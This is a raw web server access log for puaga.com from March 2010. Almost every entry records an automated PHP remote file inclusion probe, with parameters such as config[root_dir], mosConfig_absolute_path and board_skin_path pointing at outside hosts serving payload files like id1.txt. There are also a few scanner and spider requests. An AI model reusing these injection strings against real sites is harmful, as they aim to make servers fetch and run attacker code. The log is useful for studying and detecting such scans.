62.140.23.24 - - [07/Mar/2010:06:17:11 -0800] "GET /plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [07/Mar/2010:06:17:12 -0800] "GET /module//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [07/Mar/2010:06:17:14 -0800] "GET /module/setup.php//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
69.175.39.122 - - [07/Mar/2010:06:18:35 -0800] "GET /logs/access_100202.log//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:18:43 -0800] "GET /logs/access_100226.log//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:06:19:20 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:06:19:20 -0800] "GET /logs//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:06:19:23 -0800] "GET /errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:06:19:32 -0800] "GET /module/setup.php%20%20//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
188.93.10.36 - - [07/Mar/2010:06:19:58 -0800] "GET /errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:06:20:01 -0800] "GET /logs/access_100131.log//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:06:20:01 -0800] "GET /logs//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:25 -0800] "GET /write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:26 -0800] "GET /logs/access_100221.log//write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:26 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:26 -0800] "GET /write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:27 -0800] "GET /write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:27 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:27 -0800] "GET /logs/access_100221.log//write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:28 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:28 -0800] "GET /logs/access_100221.log//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:20:32 -0800] "GET /include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:20:32 -0800] "GET /logs//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:20:32 -0800] "GET /logs/access_100202.log%20%20//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:33 -0800] "GET /write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:34 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:34 -0800] "GET /logs/access_100221.log//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:38 -0800] "GET /logs/access_100217.log//write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:39 -0800] "GET /logs/access_100217.log//write_comment_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:39 -0800] "GET /logs/access_100217.log//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:20:45 -0800] "GET /logs/access_100217.log//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:21:18 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:21:18 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:21:18 -0800] "GET /?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:21:20 -0800] "GET /logs/access_100226.log%20%20//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:21:27 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:22:05 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:22:05 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:22:08 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:06:22:23 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:06:22:23 -0800] "GET /logs/access_100209.log%20%20//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:06:22:23 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:22:54 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:23:44 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:23:44 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:23:44 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [07/Mar/2010:06:23:50 -0800] "GET /logs/access_100207.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gastro-online.ru//components/com_remository/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [07/Mar/2010:06:23:50 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gastro-online.ru//components/com_remository/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [07/Mar/2010:06:23:51 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gastro-online.ru//components/com_remository/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:06:23:57 -0800] "GET /logs/access_100213.log//errors.php//errors.php?error=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:06:23:57 -0800] "GET /errors.php//errors.php?error=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:06:23:57 -0800] "GET /logs//errors.php//errors.php?error=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:06:24:00 -0800] "GET /errors.php//errors.php?error=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:06:24:00 -0800] "GET /logs//errors.php//errors.php?error=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:06:24:00 -0800] "GET /logs/access_100213.log//errors.php//errors.php?error=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:24:05 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:06:24:07 -0800] "GET /logs/access_100131.log//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:06:24:07 -0800] "GET /errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:06:24:07 -0800] "GET /logs//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:06:24:24 -0800] "GET /logs//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:06:24:24 -0800] "GET /errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:06:24:24 -0800] "GET /logs/access_100131.log//errors.php?error=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:25:20 -0800] "GET /module/setup.php%20%20//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [07/Mar/2010:06:25:20 -0800] "GET /module//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [07/Mar/2010:06:25:21 -0800] "GET /plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
200.93.147.154 - - [07/Mar/2010:06:25:33 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:25:34 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:06:26:18 -0800] "GET /-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:26:25 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:26:35 -0800] "GET /module//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [07/Mar/2010:06:26:35 -0800] "GET /plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [07/Mar/2010:06:26:38 -0800] "GET /module/setup.php%20%20//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
118.129.166.221 - - [07/Mar/2010:06:27:07 -0800] "GET /logs/access_100218.log%20%20//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:28:28 -0800] "GET /module/setup.php%20%20//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
121.119.192.41 - - [07/Mar/2010:06:29:18 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:06:29:18 -0800] "GET /logs/access_100226.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:06:29:18 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:06:29:51 -0800] "GET /logs/access_100226.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:06:29:52 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:06:29:54 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:06:30:03 -0800] "GET /logs/access_100221.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:30:06 -0800] "GET /logs/access_100202.log//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:30:16 -0800] "GET /logs/access_100226.log//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:06:30:33 -0800] "GET /logs/access_100221.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:06:32:31 -0800] "GET /write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.156 - - [07/Mar/2010:06:32:31 -0800] "GET /logs/access_100221.log//write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:06:32:45 -0800] "GET /logs/access_100217.log//write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:34:16 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:34:17 -0800] "GET /login.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:34:17 -0800] "GET /logs//login.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:34:55 -0800] "GET /logs/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:34:55 -0800] "GET ////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:34:55 -0800] "GET /logs/access_100213.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:34:58 -0800] "GET /playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:34:59 -0800] "GET /logs/access_100131.log%20%20/playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:35:00 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:35:02 -0800] "GET /logs/access_100226.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:35:06 -0800] "GET /logs/access_100131.log%20%20/playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:35:06 -0800] "GET /playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:35:06 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:35:21 -0800] "GET /logs/access_100213.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:35:21 -0800] "GET ////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:35:21 -0800] "GET /logs/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:35:32 -0800] "GET /logs/access_100226.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:37:14 -0800] "GET /logs/access_100214.log%20%20/playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:37:15 -0800] "GET /logs/access_100221.log%20%20//login.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:37:17 -0800] "GET /logs/access_100214.log%20%20/playing.php/common/db.php?commonpath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:06:37:52 -0800] "GET /convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:06:37:52 -0800] "GET /logs/access_100204.log/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:06:37:54 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [07/Mar/2010:06:38:27 -0800] "GET / HTTP/1.1" 200 3642 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "puaga.com"
211.210.38.8 - - [07/Mar/2010:06:39:39 -0800] "GET /logs/access_100208.log/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:40:19 -0800] "GET /main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:40:19 -0800] "GET /logs//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:40:19 -0800] "GET /logs/access_100129.log%20%20//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:41:21 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:41:21 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:41:22 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:41:41 -0800] "GET /logs/access_100220.log%20%20//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:06:42:45 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:06:42:45 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:06:42:45 -0800] "GET /logs/access_100204.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
